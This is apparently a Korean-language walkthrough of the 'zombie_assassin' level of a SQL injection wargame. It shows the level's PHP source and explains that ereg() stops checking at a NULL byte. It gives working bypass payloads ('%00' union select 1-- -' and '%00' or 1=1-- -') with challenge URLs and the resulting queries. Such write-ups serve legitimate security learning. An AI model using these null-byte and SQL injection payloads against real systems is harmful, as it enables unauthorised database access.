'
을 필터링하는 ereg() 함수를 우회하여 SQL Injection을 할 수 있는지 확인한다.
zombie_assassin 문제의 php 소스 코드는 다음과 같다.
<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/\\\|prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/\\\|prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(@ereg("'",$_GET[id])) exit("HeHe");
if(@ereg("'",$_GET[pw])) exit("HeHe");
$query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) solve("zombie_assassin");
highlight_file(__FILE__);
?>
if(preg_match('/\\\|prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/\\\|prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(@ereg("'",$_GET[id])) exit("HeHe");
if(@ereg("'",$_GET[pw])) exit("HeHe");
-
GET방식으로 id와 pw를 받고, id나 pw에
\
,prob
,_
,.
,()
가 들어 있으면No Hack ~_~
이 뜨고 문제 풀이에 실패한다. -
또한, id나 pw에
'
이 들어 있으면HeHe
가 뜨고 문제 풀이에 실패한다.
$query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) solve("zombie_assassin");
-
받은 id가 직접 쿼리에 들어간다. 이것으로 SQL Injection 공격이 가능하다는 것을 알 수 있다.
-
문제 풀이가 성공하는 조건은 '데이터베이스에서 받은 id에 "0"을 제외한 어떤 문자열이든 들어있음'이다.
int ereg ( string $pattern , string $string [, array &$regs ] )
-
이미 8번 Troll 문제에서 대소문자 구분 관련 취약점을 만들어낸 ereg함수이다.
-
하지만 ereg함수가 PHP 5.3+ 부터 더 이상 쓰이지 않게 된 이유는 대소문자 구분 때문이 아니다.
-
ereg함수는 POSIX Regex 함수의 하나로 PHP 5.3+ 버전에서 NULL문자를 만나면 더 이상 뒤의 문자열을 체크하지 않는 취약점을 가지고 있다.
-
php의 ereg 함수에 대해 잘 모르겠다면 다음 링크를 참고하자.
-
POSIX Regex 함수의 취약점에 대해 잘 모르겠다면 다음 링크를 참고하자.
-
NULL 문자 이용
PHP의 ereg() 함수 부분을 보면
if(@ereg("'",$_GET[id])) exit("HeHe"); if(@ereg("'",$_GET[pw])) exit("HeHe");
ereg() 함수는 NULL 문자를 만나면 더 이상 뒤의 문자열을 체크하지 않는다.
NULL 문자는 URL Encoding을 하면
%00
이 된다.따라서 입력값으로
%00' union select 1-- -
,%00' or 1=1-- -
과 같이 NULL 문자가'
앞에 오도록 값을 넣으면 ereg() 함수에서 필터링이 이루어지지 않으며, SQL문을 적당히 조작하여 값이 반환되도록 하면 문제가 풀리게 된다.http://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php?id=%00' union select 1-- - http://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php?id=%00' or 1=1-- -
select id from prob_zombie_assassin where id='' union select 1-- -' and pw='' select id from prob_zombie_assassin where id='' or 1=1-- -' and pw=''